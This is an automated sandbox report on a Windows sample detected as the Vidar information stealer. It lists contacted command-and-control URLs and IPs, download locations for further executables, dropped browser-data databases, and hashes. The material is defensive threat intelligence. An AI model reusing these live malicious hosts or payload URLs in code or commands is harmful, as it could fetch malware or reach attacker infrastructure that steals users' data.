http://mardukoff.info/kd3X/index.php	yaALNupJCH.exe, 00000000.00000003.1353892271.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1171005042.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353866017.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302613093.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302659925.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025833709.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025867465.0000000001573000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mardukoff.info/g9ecOb3jd/index.phpOn	yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1171038808.000000000155D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.dr	false		high
http://geoplugin.net/json.gpl	yaALNupJCH.exe, 00000002.00000003.885731631.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA	51372752844971756591089692.3.dr, 40080133769305826732791000.3.dr	false		high
http://geoplugin.net/json.gpp	yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mardukoff.info/g9ecOb3jd/index.phpded	yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279492013.000000000155C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pixcode.com.mx/svchost.exe4g	yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://95.P	yaALNupJCH.exe, 00000000.00000003.1302659925.0000000001581000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353892271.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315724068.0000000001581000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.0000000001584000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377001563.0000000001580000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353866017.000000000156E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.dr	false		high
http://mardukoff.info/g9ecOb3jd/index.phpPb	yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/setprefs?sig=0_d7toVxfMKzFj4yeYEy5xHRJrV_I%3D&source=en_ignored_notification&	40080133769305826732791000.3.dr	false		high
http://mardukoff.info/	yaALNupJCH.exe, 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.phpkernelbase.dll	yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mardukoff.info/g9ecOb3jd/index.phpHb	yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll	yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	12600711246403711407151220.3.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.dr	false		high
http://mardukoff.info/g9ecOb3jd/index.phpcoded	yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/solonichatcolo1dtemp.zipMozilla/5.0	yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.dr	false		high
http://transdi.org/host.exe=o	yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://95.141.41.12/n9	yaALNupJCH.exe, 00000000.00000003.1353892271.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315724068.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353866017.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1171005042.0000000001582000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302613093.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302659925.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377001563.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.0000000001581000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	12600711246403711407151220.3.dr	false		high
http://mardukoff.info/g9ecOb3jd/index.phprg	yaALNupJCH.exe, 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
81.19.131.36	unknown	Russian Federation	24658	IVC-ASRU	true
116.202.2.169	unknown	Germany	24940	HETZNER-ASDE	false
192.185.131.188	pixcode.com.mx	United States	46606	UNIFIEDLAYER-AS-1US	false
95.141.41.12	unknown	Italy	49367	ASSEFLOWAmsterdamInternetExchangeAMS-IXIT	true
157.90.36.211	transdi.org	United States	766	REDIRISRedIRISAutonomousSystemES	false
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false

Private

IP
127.0.0.127

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1315647
Start date and time:	2023-09-28 06:01:08 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	yaALNupJCH.exe
Original Sample Name:	b2ee13e6988e57f6731c20da3459c8dc.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@8/17@144/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 95 Number of non-executed functions: 269
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, tse1.mm.bing.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, g.bing.com, watson.telemetry.microsoft.com, arc.msn.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:01:50	API Interceptor	17191790x Sleep call for process: yaALNupJCH.exe modified
06:02:05	API Interceptor	1x Sleep call for process: WerFault.exe modified

Process:	C:\Users\user\Desktop\yaALNupJCH.exe
File Type:	SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 10, database pages 58, cookie 0x4a, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	118784
Entropy (8bit):	1.2127563488623585
Encrypted:	false
SSDEEP:	192:DL/8dpUXbSzTPJTH6N4Vu1BqiOk1n7PrH9Lo3LoM:DL/inbK4Vu1AiBn7b9Lo7p
MD5:	CF4BF362C0121E29AE6768346E953BAA
SHA1:	584EF6F627B7AE18B0A540DBD62019ACCE1421D8
SHA-256:	6ADEFD517E02B79AB1AD336AD4DB2A08D0783B54AA92E99597E28AEDA142075F
SHA-512:	8EBA10CFB8B62C547A9BA1DE6EF698D47DC09FB94B789ABE35765E107FFFA231EF4F22F5419AA2E84D54A931723DC9E23681482E57D315AA4FB8FD58818DAE10
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ .......:...........J......................................................f............2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\23870232221971761076349822

Download File

Process:	C:\Users\user\Desktop\yaALNupJCH.exe
File Type:	SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 10, database pages 58, cookie 0x4a, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	118784
Entropy (8bit):	1.2127563488623585
Encrypted:	false
SSDEEP:	192:DL/8dpUXbSzTPJTH6N4Vu1BqiOk1n7PrH9Lo3LoM:DL/inbK4Vu1AiBn7b9Lo7p
MD5:	CF4BF362C0121E29AE6768346E953BAA
SHA1:	584EF6F627B7AE18B0A540DBD62019ACCE1421D8
SHA-256:	6ADEFD517E02B79AB1AD336AD4DB2A08D0783B54AA92E99597E28AEDA142075F
SHA-512:	8EBA10CFB8B62C547A9BA1DE6EF698D47DC09FB94B789ABE35765E107FFFA231EF4F22F5419AA2E84D54A931723DC9E23681482E57D315AA4FB8FD58818DAE10
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ .......:...........J......................................................f............2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\40080133769305826732791000

Download File

Process:	C:\Users\user\Desktop\yaALNupJCH.exe
File Type:	SQLite 3.x database, last written using SQLite version 3041002, file counter 13, database pages 39, cookie 0x43, schema 4, UTF-8, version-valid-for 13
Category:	dropped
Size (bytes):	163840
Entropy (8bit):	1.3946502694018108
Encrypted:	false
SSDEEP:	3072:9GswsRsO8DVsTDESksWsr8cV/T4XdzwWAyk1x782SqR:9GswsRsO8DVsTDEZsWsr8cV/T4XdzwWu
MD5:	AAAAEEC8464A1F2726F1C7EB1490672F
SHA1:	185241D1808FE5B6C27A4EDA59BDE8DA1D7FD914
SHA-256:	C2FE86A37BF9A8F4D3A7F841C420E8A4760FEEFFBB1B185908C054A42D217BB1
SHA-512:	285FC3D8E2A48CE061B2523CF9B4F0D74A6EF121FE7465AD4D2DD9FB090993253ED9C1B7650E6BA072E472CC71BA6469CFC0DE9F7BE069AC4E43EBCB011DEA29
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ .......'...........C......................................................f.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\47939516334230945650046664

Download File

Process:	C:\Users\user\Desktop\yaALNupJCH.exe
File Type:	SQLite 3.x database, last written using SQLite version 3041002, file counter 28, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 28
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	1.8754789561675447
Encrypted:	false
SSDEEP:	96:cejhLnwke2HOPYeTV8C5sL9Dv50Rwhba5DXMcF0GM6TepkPU7MimZgudiv:cXB6C5O7ORwE5Qj56rU7MisDu
MD5:	4A1934EA620642696D920AAAC846E305
SHA1:	FE1D8E2CFBAFE98413609C3C77F5685E1EEEA73B
SHA-256:	ECC80D57F50C1A3E6B9066E76E7A313833E1FCA67369CFF798EF61CC193497E3
SHA-512:	9188522FC94D578F8AD726FA4BB27A35A107562F6755C0BA6883B5EA0F409D666AA7FC93319805C94DDB832FAEB5D8A956BF6FEEC3668EF02A372FDAAB4D434C
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................f..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\51372752844971756591089692

Download File

Process:	C:\Users\user\Desktop\yaALNupJCH.exe
File Type:	SQLite 3.x database, last written using SQLite version 3041002, file counter 13, database pages 39, cookie 0x43, schema 4, UTF-8, version-valid-for 13
Category:	dropped
Size (bytes):	163840
Entropy (8bit):	1.3946502694018108
Encrypted:	false
SSDEEP:	3072:9GswsRsO8DVsTDESksWsr8cV/T4XdzwWAyk1x782SqR:9GswsRsO8DVsTDEZsWsr8cV/T4XdzwWu
MD5:	AAAAEEC8464A1F2726F1C7EB1490672F
SHA1:	185241D1808FE5B6C27A4EDA59BDE8DA1D7FD914
SHA-256:	C2FE86A37BF9A8F4D3A7F841C420E8A4760FEEFFBB1B185908C054A42D217BB1
SHA-512:	285FC3D8E2A48CE061B2523CF9B4F0D74A6EF121FE7465AD4D2DD9FB090993253ED9C1B7650E6BA072E472CC71BA6469CFC0DE9F7BE069AC4E43EBCB011DEA29
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ .......'...........C......................................................f.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\75845963097410420630072605

Download File

Process:	C:\Users\user\Desktop\yaALNupJCH.exe
File Type:	SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 3, database pages 26, cookie 0x1c, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	0.83744704020136
Encrypted:	false
SSDEEP:	96:5XH0NFeymDlGvKLwy0Obn8MouOioeDomFqLm:F0NQlGjJa7DB
MD5:	5A8897272B634D28751949B925A3FF4B
SHA1:	A44AC70766BA831C922C932550D2E380476CF5E3
SHA-256:	9A4A256FA3B71C5C9B1C7A092694EBE853996A5EDBB2ED52B969ABBC2AE1B304
SHA-512:	00F4DCFD3F2DCF611AA0764B79A37185F6670290EE8554D8DB0394281FA87A312AAA490AC35FC3884E96E3464200094D0CD129ADEDB1D4C8998F3425C7A51BC5
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................f.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yaALNupJCH.exe_64a9e661c3b34368e58789efa21712546fdb92_fbdb3446_1e792b0d\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1059234151728974
Encrypted:	false
SSDEEP:	192:qVD8PHqMnJajT9BKzggk/u7sXS274It8:vPqMnJajpUk/u7sXX4It8
MD5:	D27528534FB44D0A7BEAC65E4FAF14FD
SHA1:	878CC5217DA44C78AFCC22F8685B0EB72C22ED8B
SHA-256:	14FA71875CAC68E9F1A799F84AB8F5EB800B89CC88391B1A63E4C45E0FFF0ACB
SHA-512:	B05051460DC4560DD02F8576D49B72F5C4C9FF1455EC4EA7F1FC7039E288F43FA84A613B9F88222162BDE85258C3B572A8D11F1C51F82309CBE4911E4FEA1079
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.0.3.4.7.3.2.2.9.2.9.1.5.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.0.3.4.7.3.2.3.4.2.9.1.4.7.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.b.b.f.5.4.5.-.3.4.7.9.-.4.8.3.5.-.b.f.e.0.-.3.a.9.b.c.7.e.c.0.1.e.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.c.f.4.3.b.2.-.8.c.6.e.-.4.e.3.2.-.8.5.3.a.-.e.6.4.b.a.2.8.7.a.9.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.A.L.N.u.p.J.C.H...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.a.8.-.0.0.0.1.-.0.0.2.8.-.1.e.9.a.-.5.d.8.5.c.0.f.1.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.d.b.a.5.4.a.0.1.d.5.5.7.3.4.f.9.0.f.5.d.f.5.6.7.d.b.d.b.7.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.3.b.e.7.b.e.7.0.9.6.1.a.3.8.1.c.4.8.d.3.5.b.a.7.d.3.7.a.d.d.0.7.a.3.e.4.7.7.a.3.!.y.a.A.L.N.u.p.J.C.H...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2197.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Sep 28 04:02:03 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	124316
Entropy (8bit):	1.9824329035571402
Encrypted:	false
SSDEEP:	384:5SJJiksJAihpKY3wr8abaTacNi2Fh8R2gq59FDQrqDQ:c8JAihWATb0R2gMLDkqM
MD5:	68AC272A1F628AB28499C3BA36325BA9
SHA1:	299C3FB19D04DFF0985284462DA79AE32A0C3CFB
SHA-256:	6F3AF91624C434735E8E8435EB2451029E5E6F3F6CCA4F4A437DB1A6320C83E6
SHA-512:	F2DF40A037999932795405F3E49CFE2EA7B5DED6D8D9424A0150F9F67DE3AD14E58B98C4DD4430A84B95F3F38E3D28BD870688826F4064F2C62632DA4260D6FB
Malicious:	false
Reputation:	low
Preview:	MDMP....... ..........e........................d...(.......$....'..........$T..........`.......8...........T...........XN..D............'...........)...................................................................U...........B......4*......GenuineIntelW...........T..............e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER22F0.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8372
Entropy (8bit):	3.7099766761451254
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiPw6dH6Y3R6AgmfvdS7K+prM89b3Vsfy9m:RrlsNiY696YB6AgmfvdS7/3ufB
MD5:	C27878783F17D9B9705A6D56391AA258
SHA1:	E648D96B25C7557BFD40AADFA4AE6010B0F9F629
SHA-256:	2CE8E1C18B456ED8387B556E315ACB97ADEDD34B9F79EA716EB5B8D5CA65DB53
SHA-512:	42631AEB8DF7571A457879DDEE293EAFDDC3AF95AF0C62E29F64F7D220E2C742A1B5857410A05F80F13EB7351FEA48CD1F360E682DE11EC14AFD989BAD7B2BE8
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2320.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4613
Entropy (8bit):	4.517169981598317
Encrypted:	false
SSDEEP:	48:cvIwSD8zsYJgtWI9P/Wgc8sqYjw8fm8M4JSNVZFM+q8iu4kxOar4d:uITfe0ugrsqYxJSTI9nkxOar4d
MD5:	16CC19EF936C2D4A7A5ED66716D5FE12
SHA1:	7E22B8DA44C3863483A7A82147E6A124E28CFA86
SHA-256:	B7D0C515FDB1C4D218E1BD20D78B82729AB672AC18437B95E899B8C18F857FFC
SHA-512:	B427A927219CB1F2C5B7972A51100C36EBAE85C63283E3054B8540E181CC29753ABC4002104273DEC3AE0C9C58E27518F93384665A2B534A2DA6D528409D45F4
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2237112" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe

Download File

Process:	C:\Users\user\Desktop\yaALNupJCH.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	322560
Entropy (8bit):	6.597312773404436
Encrypted:	false
SSDEEP:	6144:QmTK+XavNsTl/UUa5PI4AFuGIe/EH1/RJwpQ6hOnkN6:QYTZoh0EH1/RJweF
MD5:	C0E52C2A2F9B11D3361B2DAA096B6D96
SHA1:	40EFD6D940C2A8729544FF1F938EE896F2043BD1
SHA-256:	31477F61830426105B5A9B61B32BD1D398804AFAF660F3417800218F70CC721D
SHA-512:	D9C609D0146347582F705FE76B5DA8BFA40149B9751BDAF906FE1C8CDBEEF4F1039FDC0A957E7E76A0C9E42F8738E7B7188D59B5845FE791CDE1D66D2E95C31C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9I..X'.X'.X'.....X'.....X'......X'. ..X'. ..X'.X&..X'......X'.....X'.Rich.X'.........PE..L...0n.e.................\|...........q............@..........................P............@.....................................x................................D..................................pM..@............................................text....z.......\|.................. ..`.rdata..............................@..@.data....R...........z..............@....reloc...U.......V..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\json[1].json

